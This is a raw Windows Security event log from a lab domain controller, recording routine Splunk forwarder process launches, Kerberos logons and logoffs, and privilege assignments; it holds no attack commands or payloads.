ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265147
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265149
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C325A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:59:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265152
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C6061
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:59:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265151
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C6061
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65016
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:59:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265150
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C6061
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:00:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265153
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a20
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265155
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1474
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265154
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265156
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265157
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265159
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x38c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265158
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:00:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265162
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C991F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:00:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265161
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C991F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65029
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:00:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265160
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C991F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:01:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265163
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265165
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf44
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265164
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x258
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265166
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a64
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265167
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CB268
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54264
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:01:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265169
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265168
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x88c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:01:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265170
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
